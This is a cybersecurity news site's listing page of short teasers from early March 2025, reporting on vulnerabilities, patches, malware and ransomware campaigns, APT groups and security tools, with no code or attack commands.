Tag: GBHackers Security | #1 Globally Trusted Cyber Security News Platform

Google’s FLARE team has released GoStringUngarbler, an open-source tool designed to dismantle string obfuscation in Go binaries protected by the garble compiler. This innovation addresses growing concerns over malware authors exploiting garble’s advanced literal transformations, which render traditional static analysis ineffective.…

Read more →

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) escalated warnings on March 4, 2025, by adding four severe vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog. Federal agencies and private organizations are urged to prioritize mitigation efforts, as threat actors…

Read more →

Cisco Systems has disclosed a security vulnerability in its Webex for BroadWorks unified communications platform that could allow attackers to intercept sensitive credentials and user data under specific configurations. The flaw, tracked as CSCwo20742 and classified as a low-severity issue, impacts organizations…

Read more →

A network of suspected North Korean IT workers is using GitHub to create and backstop fake personas, aiming to infiltrate companies globally, particularly in Japan and the United States. DPRK-Linked Network Targets Companies in Japan and US Cybersecurity firm Nisos…

Read more →

A sophisticated Advanced Persistent Threat (APT) group, known as CNC, has been conducting a cyber espionage campaign dubbed “Operation Sea Elephant” targeting scientific research institutions and universities in South Asia. The operation, which aims to steal research data related to…

Read more →

Cybersecurity researchers at G DATA have uncovered a sophisticated malware campaign utilizing fake booking websites to deliver the LummaStealer malware through deceptive CAPTCHA prompts. This new attack vector, discovered in January 2025, marks a significant shift in LummaStealer’s distribution methods,…

Read more →

A critical security flaw in the widely used GiveWP – Donation Plugin and Fundraising Platform has left over 10,000 WordPress websites vulnerable to remote code execution attacks since March 3, 2025. Tracked as CVE-2025-0912, the vulnerability allows unauthenticated attackers to hijack sites by…

Read more →

A sophisticated phishing campaign targeting the Albion Online gaming community has been uncovered, revealing a complex operation involving impersonation of the Electronic Frontier Foundation (EFF) and deployment of advanced malware. The campaign, discovered on March 4, 2025, showcases the evolving…

Read more →

The U.S. Department of the Treasury has intensified its global campaign against darknet-facilitated drug trafficking by sanctioning Behrouz Parsarad, the Iran-based administrator of the notorious Nemesis Marketplace. The move, announced on March 5, 2025, follows a 2024 international law enforcement…

Read more →

A newly documented exploitation technique targeting Telegram’s file-sharing infrastructure has raised alarms in cybersecurity circles. Dubbed “EvilVideo,” this attack vector leverages a vulnerability (CVE-2024-7014) in how Telegram processes multimedia content, enabling attackers to disguise malicious HTML files as video files.…

Read more →

A high-severity security flaw in the widely used Vim text editor allows attackers to execute arbitrary code on vulnerable systems by tricking users into opening specially crafted TAR archives. Tracked as CVE-2025-27423, this vulnerability has prompted urgent patching efforts and warnings…

Read more →

A critical security flaw in Zoho’s widely used identity management solution, ADSelfService Plus, has been patched after researchers discovered it could enable attackers to hijack user sessions and compromise sensitive enrollment data. Tracked as CVE-2025-1723, the high-severity vulnerability underscores the risks…

Read more →

Security researchers have released proof-of-concept (PoC) exploit code for critical vulnerabilities in Hewlett Packard Enterprise’s (HPE) Insight Remote Support (IRS) tool, including an unauthenticated XML External Entity (XXE) injection flaw (CVE-2024-53675) and a path traversal-based remote code execution (RCE) vulnerability (CVE-2024-53676).  These flaws affect…

Read more →

NVIDIA has issued an urgent security bulletin urging customers using its Hopper HGX 8-GPU High-Performance Computing (HMC) systems to immediately install firmware updates addressing two critical vulnerabilities. Released on February 28, 2025, the patches target flaws that could allow attackers to execute…

Read more →

A recently patched remote code execution (RCE) vulnerability in Microsoft Windows’ Key Distribution Center (KDC) Proxy implementation allows unauthenticated attackers to take control of vulnerable servers through manipulated Kerberos authentication traffic. Designated CVE-2024-43639 and rated 9.8 CVSS, this critical flaw stems from…

Read more →

Google has rolled out Chrome 134 to the stable channel for Windows, macOS, and Linux, addressing 14 security vulnerabilities—including high-severity flaws that could enable remote code execution or crashes. The update, version 134.0.6998.35 for Linux, 134.0.6998.35/36 for Windows, and 134.0.6998.44/45 for…

Read more →

Pathfinder AI expands Hunters’ vision for AI-driven SOCs, introducing Agentic AI for autonomous investigation and response. Hunters, the leader in next-generation SIEM, today announced Pathfinder AI, a major step toward a more AI-driven SOC. Building on Copilot AI, which is…

Read more →

In a concerning development, cybercriminals are increasingly targeting cloud-based generative AI (GenAI) services in a new attack vector dubbed “LLMjacking.” These attacks exploit non-human identities (NHIs) machine accounts and API keys to hijack access to large language models (LLMs) hosted…

Read more →

A recent technical study conducted by researchers at Trinity College Dublin has revealed that Google collects and stores extensive user data on Android devices, even when pre-installed Google apps are never opened. The findings indicate that cookies, device identifiers, and…

Read more →

A newly identified cyberattack campaign, dubbed GrassCall, is targeting job seekers in the cryptocurrency and Web3 sectors through fake job interviews. Attributed to the Russian-speaking cybercriminal group “Crazy Evil,” the campaign uses fraudulent job postings on platforms like LinkedIn, WellFound,…

Read more →

Security researchers have uncovered sophisticated obfuscation techniques employed by APT28, a Russian-linked advanced persistent threat (APT) group, in their HTA (HTML Application) Trojan. The analysis, part of an ongoing investigation into APT28’s cyber espionage campaigns targeting Central Asia and Kazakhstan,…

Read more →

Microsoft has announced the removal of the Data Encryption Standard (DES) encryption algorithm from Kerberos in Windows 11 version 24H2 and Windows Server 2025. This change, set to take effect with updates released on or after September 9, 2025, aims…

Read more →

A sophisticated cyber espionage campaign targeting the aviation and satellite communications sectors in the United Arab Emirates has been uncovered by Proofpoint researchers. The operation, attributed to a threat cluster dubbed “UNK_CraftyCamel,” demonstrates advanced techniques, including leveraging trusted business relationships…

Read more →

Microsoft has introduced a series of technical recommendations to bolster the security of Virtualization-Based Security (VBS) enclaves, a key component of trusted execution environments (TEE). VBS enclaves leverage the hypervisor’s Virtual Trust Levels (VTLs) to isolate sensitive memory and code…

Read more →

Multinational engineering and technology services firm Tata Technologies has reportedly fallen victim to a significant cyberattack claimed by the ransomware group Hunters International. According to recent social media reports, the breach allegedly resulted in the theft of 1.4 terabytes of…

Read more →

Imagine a government that tracks your daily movements, monitors your communications, and catalogs your digital habits. While this conjures images of authoritarian regimes, a parallel reality exists in the United States, where law enforcement agencies leverage the vast data reservoirs…

Read more →

U.S. authorities announced the seizure of $31 million tied to the 2021 Uranium Finance decentralized finance (DeFi) exploits. The coordinated effort between the U.S. Attorney’s Office for the Southern District of New York (SDNY) and Homeland Security Investigations (HSI) San…

Read more →

A recently disclosed vulnerability in Docusnap’s Windows client software (CVE-2025-26849) enables attackers to decrypt sensitive system inventory files through a hardcoded encryption key, exposing critical network information to potential exploitation.  Cybersecurity researchers at RedTeam Pentesting GmbH revealed that inventory files…

Read more →

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2018-8639, a decade-old Microsoft Windows privilege escalation flaw, to its Known Exploited Vulnerabilities (KEV) catalog amid confirmed active attacks. First patched by Microsoft in December 2018, this Win32k kernel-mode driver vulnerability…

Read more →

Google’s March 2025 Android Security Bulletin has unveiled two critical vulnerabilities—CVE-2024-43093 and CVE-2024-50302—currently under limited, targeted exploitation. These flaws, impacting Android versions 12 through 15, underscore escalating risks for billions of devices. The bulletin mandates the immediate installation of the…

Read more →

A critical vulnerability in BigAntSoft’s enterprise chat server software has exposed ~50 internet-facing systems to unauthenticated remote code execution attacks. Designated CVE-2025-0364, this exploit chain enables attackers to bypass authentication protocols, create administrative accounts, and execute malicious PHP code on vulnerable…

Read more →

With the growing importance of security compliance for startups, more companies are seeking to achieve and maintain compliance with frameworks like SOC 2, ISO 27001 & GDPR. Bubba AI, Inc. is building a comprehensive solution for these organizations to easily…

Read more →

A newly disclosed path traversal vulnerability (CVE-2024-4885) in Progress Software’s WhatsUp Gold network monitoring solution has raised alarms across the cybersecurity community. Rated as critical, this flaw enables unauthenticated attackers to execute arbitrary code on affected systems by exploiting improper…

Read more →

Two critical security flaws in IBM Storage Virtualize products could enable attackers to bypass authentication protections and execute malicious code on enterprise storage systems, according to a security bulletin issued by the company. Tracked as CVE-2025-0159 and CVE-2025-0160, these vulnerabilities…

Read more →

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an urgent warning on March 3, 2025, about actively exploiting a critical command injection vulnerability (CVE-2023-20118) affecting end-of-life Cisco Small Business RV Series Routers. The flaw, which carries a CVSSv3.1 score…

Read more →

In a concerning trend, the frequency of scanning attacks targeting Internet of Things (IoT) devices and network routers has surged dramatically, reaching unprecedented levels. According to recent data from F5 Labs, the total number of scanning events increased by 91%…

Read more →

Kaspersky’s latest report on mobile malware evolution in 2024 reveals a significant increase in cyber threats targeting mobile devices. The security firm’s products blocked a staggering 33.3 million attacks involving malware, adware, or unwanted mobile software throughout the year. Mobile…

Read more →

Cybersecurity researchers have uncovered a surge in the use of Advanced Encryption Standard (AES) encryption by threat actors to shield malicious payloads from detection. This technique, combined with code virtualization and staged payload delivery, is being employed by malware families…

Read more →

Google is rolling out a new privacy-focused feature called Shielded Email, designed to prevent apps and services from accessing users’ primary email addresses during sign-ups. The feature, first discovered in a Google Play Services APK teardown by Android Authority months ago, will generate…

Read more →

Unit 42 researchers have observed a threat actor group known as JavaGhost exploiting misconfigurations in Amazon Web Services (AWS) environments to conduct sophisticated phishing campaigns. Active for over five years, JavaGhost has pivoted from website defacement to leveraging compromised cloud…

Read more →

Cybersecurity experts are warning of an increasing trend in fileless attacks, where hackers leverage PowerShell and legitimate Microsoft applications to deploy malware without leaving significant traces on compromised systems. These sophisticated attacks, which have been around for over two decades,…

Read more →

The United States has suspended offensive cyber operations against Russia under an order issued by Defense Secretary Pete Hegseth, according to multiple confirmed reports. The directive, first revealed by The Record and corroborated by The New York Times and The Washington Post, marks a notable…

Read more →

A new variant of malware, dubbed “Poco RAT,” has emerged as a potent espionage tool in a campaign targeting Spanish-speaking users in Latin America. Security researchers at Positive Technologies Expert Security Center (PT ESC) have linked this malware to the…

Read more →

A recent investigation by cybersecurity experts has unveiled a series of advanced cyberattacks orchestrated by the notorious Advanced Persistent Threat (APT) group known as “Space Pirates.” Leveraging their customized malware arsenal, including the LuckyStrike Agent backdoor, the group has been…

Read more →

Security researchers have uncovered five significant vulnerabilities in Paragon Partition Manager’s BioNTdrv.sys driver, affecting versions prior to 2.0.0. These flaws, identified as CVE-2025-0285, CVE-2025-0286, CVE-2025-0287, CVE-2025-0288, and CVE-2025-0289, pose serious security risks, enabling attackers to escalate privileges to SYSTEM level…

Read more →

Security researchers have uncovered new evidence that North Korean threat actors, particularly the Lazarus Group, are actively using Astrill VPN to conceal their true IP addresses during cyberattacks and fraudulent IT worker schemes. Silent Push, a cybersecurity firm, recently acquired…

Read more →

A new campaign involving the notorious remote access trojan (RAT) Njrat has been uncovered, leveraging Microsoft’s Dev Tunnels service for command-and-control (C2) communication. This service, intended to help developers securely expose local services to the internet for testing and debugging,…

Read more →

Cybersecurity researchers have uncovered a sophisticated phishing campaign leveraging Google Ads and PayPal’s infrastructure to deceive users and steal sensitive personal data. The attackers exploited vulnerabilities in Google’s ad policies and PayPal’s “no-code checkout” feature to create fraudulent payment links…

Read more →

A newly disclosed vulnerability in Substack’s custom domain setup could allow malicious actors to hijack inactive subdomains, putting thousands of blogs at risk of serving unauthorized content. The flaw, discovered by an independent security researcher, exploits misconfigured DNS records to…

Read more →

Federal prosecutors have filed a detention memorandum urging the court to indefinitely detain Cameron John Wagenius, a 21-year-old active-duty U.S. Army soldier stationed at Fort Cavazos, Texas, following his alleged involvement in a multi-state cybercrime campaign targeting at least 15…

Read more →

Security researchers have publicly disclosed a proof-of-concept (PoC) exploit for CVE-2025-21333, a critical elevation-of-privilege vulnerability in Microsoft’s Hyper-V virtualization framework. The vulnerability resides in the vkrnlintvsp.sys driver and enables local attackers to gain SYSTEM privileges through a sophisticated heap manipulation technique. Microsoft rated this flaw…

Read more →

A sophisticated kernel exploit leveraging CVE-2023-32434, an integer overflow vulnerability in Apple’s XNU virtual memory subsystem, has been unveiled by security researchers. Dubbed Trigon, this exploit chain enables deterministic kernel read/write primitives on A10(X) devices, bypassing Apple’s KTRR and PPL protections…

Read more →

Network penetration testing is a cybersecurity practice that simulates cyberattacks on an organization’s network to identify vulnerabilities and improve security defenses. Ethical hackers, or penetration testers, use tools and techniques to mimic real-world hacking attempts, targeting network components like routers,…

Read more →

Hacktivism, once synonymous with symbolic website defacements and distributed denial-of-service (DDoS) attacks, has evolved into a sophisticated tool for cyber warfare and influence operations. Recent research highlights how state-sponsored actors are increasingly leveraging hacktivist tactics to conduct large-scale cyber campaigns,…

Read more →

Belgium’s State Security Service (VSSE) has suffered what is being described as its most severe security breach to date. For nearly two years, a group of Chinese hackers exploited a vulnerability in Barracuda’s Email Security Gateway Appliance, a cybersecurity tool…

Read more →

Multi-factor authentication (MFA), long considered a cornerstone of cybersecurity defense, is facing a formidable new threat: “Pass-the-Cookie” attacks. Recent findings reveal from Long Wall shows that threat actors exploit browser session cookies to bypass MFA entirely, granting full access to corporate…

Read more →

A sophisticated cyberespionage campaign linked to Chinese state-sponsored actors has exploited a previously patched Check Point VPN vulnerability (CVE-2024-24919) to infiltrate organizations across Europe, Africa, and the Americas, according to cybersecurity researchers. The attacks, observed between June 2024 and January…

Read more →

A critical security flaw (CVE-2025-20059) has been identified in supported versions of Ping Identity’s PingAM Java Agent, potentially enabling attackers to bypass policy enforcement and access protected resources. The vulnerability—classified as a Relative Path Traversal (CWE-23) weakness—affects all PingAM Java Agent deployments…

Read more →

A sophisticated malware campaign leveraging GitHub repositories disguised as game modifications and cracked software has been uncovered, exposing a dangerous convergence of social engineering tactics and automated credential harvesting. Security researchers identified over 1,100 malicious repositories distributing variants of the Redox…

Read more →

Netskope Threat Labs uncovered a sprawling phishing operation involving 260 domains hosting approximately 5,000 malicious PDF files. These documents, disguised as legitimate resources, employ fake CAPTCHA prompts to redirect victims to phishing sites designed to harvest credit card details and…

Read more →

A sweeping analysis of the Common Crawl dataset—a cornerstone of training data for large language models (LLMs) like DeepSeek—has uncovered 11,908 live API keys, passwords, and credentials embedded in publicly accessible web pages.  The leaked secrets, which authenticate successfully with…

Read more →

A new wave of cyberattacks leveraging the Winos4.0 malware framework has targeted organizations in Taiwan through malicious PDF attachments disguised as tax inspection alerts, according to a January 2025 threat analysis by FortiGuard Labs.  The campaign employs multi-stage payload delivery,…

Read more →

The Lotus Blossom hacker group, also known as Spring Dragon, Billbug, or Thrip, has been identified leveraging legitimate cloud services like Dropbox, Twitter, and Zimbra for command-and-control (C2) communications in their cyber espionage campaigns. Cisco Talos researchers attribute these sophisticated…

Read more →

In a concerning development, cybersecurity researchers at Trellix have uncovered a sophisticated malware campaign that exploits a legitimate antivirus driver to bypass system protections. The malware, identified as “kill-floor.exe,” leverages the Avast Anti-Rootkit driver (aswArPot.sys) to gain kernel-level access, effectively…

Read more →

The DragonForce ransomware group has launched a significant cyberattack on critical infrastructure in Saudi Arabia, targeting a prominent real estate and construction company in Riyadh. This marks the first time the group has targeted a major enterprise in the Kingdom,…

Read more →

In Q3 2024, Cofense Intelligence uncovered a targeted spear-phishing campaign aimed at employees working in social media, marketing, and related roles. The attackers impersonated Fortune 500 companies, including Meta, Coca-Cola, and PayPal, to lure victims into applying for fake job…

Read more →

Cyber adversaries have evolved into highly organized and professional entities, mirroring the operational efficiency of legitimate businesses, according to the CrowdStrike 2025 Global Threat Report. The report highlights a significant shift in the cyber threat landscape during 2024, with attackers…

Read more →

A newly identified malware, dubbed “Squidoor,” has emerged as a sophisticated threat targeting government, defense, telecommunications, education, and aviation sectors in Southeast Asia and South America. Attributed to a suspected Chinese threat actor under the activity cluster CL-STA-0049, Squidoor employs…

Read more →

A new wave of cyberattacks targeting WordPress websites has been uncovered, with attackers leveraging fake plugins to inject malicious links into site footers. These links, often promoting casino-related spam, compromise website integrity and can severely impact search engine optimization (SEO).…

Read more →

A new ransomware group, dubbed Anubis, has emerged as a significant threat in the cybersecurity landscape. Active since late 2024, Anubis employs advanced techniques and operates across multiple platforms, including Windows, Linux, NAS, and ESXi environments. The group is leveraging…

Read more →

Microsoft has removed two widely-used Visual Studio Code (VS Code) extensions, “Material Theme Free” and “Material Theme Icons Free,” from its marketplace after cybersecurity researchers discovered malicious code embedded within them. These extensions, developed by Mattia Astorino (also known as…

Read more →

The modern cybersecurity landscape is witnessing an unprecedented surge in sophisticated attack techniques, with adversaries increasingly exploiting legitimate command-line tools to execute malicious actions. To address this evolving threat, Microsoft Defender for Endpoint has enhanced its capabilities to detect and…

Read more →

A new wave of sophisticated cyberattacks targeting macOS systems has been identified, involving two malware strains, RustDoor and Koi Stealer. These attacks, attributed to North Korea-linked Advanced Persistent Threat (APT) groups, primarily aim at stealing sensitive login credentials and cryptocurrency…

Read more →

A newly identified cybercriminal group, LARVA-208, also known as EncryptHub, has successfully infiltrated 618 organizations globally since June 2024, leveraging advanced social engineering techniques to steal credentials and deploy ransomware. According to reports from cybersecurity firms CATALYST and Prodaft, the…

Read more →

Recent revelations about Google’s SafetyCore app have ignited a firestorm of privacy debates, echoing Apple’s recent controversy over photo scanning. The app, silently installed on Android devices via system updates, enables on-device image analysis to detect sensitive content—a feature marketed…

Read more →

Security researchers have uncovered a novel Bluetooth tracking vulnerability in Apple’s Find My network – the system powering AirTags and device-finding capabilities across iPhones, iPads, and Macs. Dubbed “nRootTag,” the attack transforms nearly any Bluetooth-enabled computer or smartphone into an…

Read more →

Cybersecurity firm Group-IB, alongside the Royal Thai Police and Singapore Police Force, announced the arrest of a prolific hacker linked to over 90 major data breaches across 25 countries, including 65 attacks in the Asia-Pacific region. The cybercriminal, operating under aliases ALTDOS, DESORDEN,…

Read more →

Cisco Systems has issued a critical security advisory for a newly disclosed command injection vulnerability affecting its Nexus 3000 and 9000 Series Switches operating in standalone NX-OS mode. Tracked as CVE-2025-20161 (CVSSv3 score: 5.1), the flaw enables authenticated attackers with administrative privileges…

Read more →

A newly discovered Wi-Fi jamming technique enables attackers to selectively disconnect individual devices from networks with surgical precision, raising alarms across cybersecurity and telecommunications industries. Researchers from Northeastern University and the University of Chicago uncovered this vulnerability in IEEE 802.11…

Read more →

GitLab has urgently released security updates to address multiple high-severity vulnerabilities in its platform that could allow attackers to bypass security mechanisms, execute malicious scripts, and access sensitive data. The patches, included in versions 17.9.1, 17.8.4, and 17.7.6 for both…

Read more →

A high-severity security vulnerability (CVE-2025-0514) in LibreOffice, the widely used open-source office suite, has been patched after researchers discovered it could allow attackers to execute malicious files on Windows systems by exploiting hyperlink handling mechanisms. The flaw, which impacts versions…

Read more →

Cisco Systems has disclosed a high-severity vulnerability (CVE-2025-20111) in its Nexus 3000 and 9000 Series Switches operating in standalone NX-OS mode. The vulnerability enables unauthenticated attackers to trigger denial of service (DoS) conditions through crafted Ethernet frames. Rated 7.4 on…

Read more →

Recent cybersecurity investigations have uncovered a sophisticated technique employed by threat actors to evade detection during malware distribution. Attackers are leveraging ephemeral port 60102, typically reserved for temporary communications, as a service port for covert malware transmission. This approach bypasses…

Read more →

The LCRYX ransomware, a malicious VBScript-based threat, has re-emerged in February 2025 after its initial appearance in November 2024. Known for encrypting files with the .lcryx extension and demanding $500 in Bitcoin for decryption, this ransomware has evolved with advanced…

Read more →

A new wave of cyberattacks attributed to the Ghostwriter Advanced Persistent Threat (APT) group has been detected, targeting government and military entities in Ukraine and opposition groups in Belarus. The campaign, active since late 2024, employs weaponized Excel (XLS) files…

Read more →

A sophisticated cyber campaign orchestrated by the Chinese Advanced Persistent Threat (APT) group, Silver Fox, has been uncovered, targeting healthcare services in North America. The attackers exploited Philips DICOM Viewer software to deploy malicious payloads, including a backdoor remote access…

Read more →

In a groundbreaking development, researchers have uncovered how attackers are exploiting Windows Virtualization-Based Security (VBS) enclaves to create malware that is highly evasive and difficult to detect. VBS enclaves, designed as isolated and secure regions of memory within a process,…

Read more →

A recent discovery by cybersecurity researchers has revealed that the Poseidon malware, a macOS-targeting trojan, is leveraging PKG files with preinstall scripts to infiltrate systems. This malware, weighing only 207 bytes, is currently undetected by VirusTotal and represents a significant…

Read more →

A financial management app named Finance Simplified has been revealed as a malicious tool for stealing sensitive user data and engaging in blackmail. Despite its fraudulent nature, the app managed to accumulate over 100,000 downloads from the Google Play Store…

Read more →

In a concerning new development, cybercriminals are exploiting the widespread popularity of the recently launched DeepSeek AI chatbot to distribute the Vidar Stealer malware. According to research by Zscaler ThreatLabz, attackers are using brand impersonation tactics to lure unsuspecting users…

Read more →

The cybersecurity landscape has witnessed a significant uptick in ransomware activity, with six new data-leak sites (DLSs) linked to emerging ransomware groups identified in early 2025. According to Cyjax, these groups include Kraken, Morpheus, GD LockerSec, Babuk2, Linkc, and the…

Read more →

In a significant breakthrough, cybersecurity firm Silent Push has uncovered sensitive infrastructure tied to the Lazarus Group, a North Korean state-sponsored Advanced Persistent Threat (APT). This discovery sheds light on the group’s involvement in the historic $1.4 billion cryptocurrency heist…

Read more →

MITRE has unveiled the Offensive Cyber Capability Unified LLM Testing (OCCULT) framework, a groundbreaking methodology designed to evaluate risks posed by large language models (LLMs) in autonomous cyberattacks. Announced on February 26, 2025, the initiative responds to growing concerns that…

Read more →

A significant cybersecurity breach at Genea, one of Australia’s largest in vitro fertilization (IVF) providers, has raised alarms among thousands of patients amid concerns that sensitive medical data and treatment schedules may be compromised. The clinic confirmed on Wednesday that…

Read more →

A critical set of 20 security vulnerabilities in GRUB2, the widely used bootloader for Linux systems, has been revealed, exposing millions of devices to potential secure boot bypass and remote code execution attacks. Discovered during a proactive hardening initiative, these…

Read more →

Telecommunications provider Orange Communication faces a potential data breach after a threat actor using the pseudonym “Rey” claimed responsibility for leaking 380,000 email records and sensitive corporate data on a dark web forum. The alleged breach, disclosed earlier this week, includes source code, internal invoices,…

Read more →

A series of critical security vulnerabilities in the widely-used Rsync file synchronization tool have been uncovered, exposing millions of servers to potential takeover by anonymous attackers.  The flaws, discovered in Rsync version 3.2.7 and earlier, enable remote code execution, sensitive…

Read more →

A critical security vulnerability in the Essential Addons for Elementor plugin, installed on over 2 million WordPress websites, has exposed sites to script injection attacks via malicious URL parameters. The flaw, tracked as CVE-2025-24752 and scoring 7.1 (High) on the CVSS scale, allowed attackers to execute…

Read more →

A novel malware delivery framework employing advanced obfuscation techniques has evaded detection by security tools for over 48 hours. The attack chain centers around a Batch script that leverages PowerShell and Visual Basic Script (VBS) to deploy either the XWorm…

Read more →

DISA Global Solutions, a Houston-based provider of employee background checks and workplace safety services, disclosed a significant cybersecurity incident exposing the personal information of over 3.3 million individuals, including 15,198 Maine residents. The breach occurred on February 9, 2024, but was…

Read more →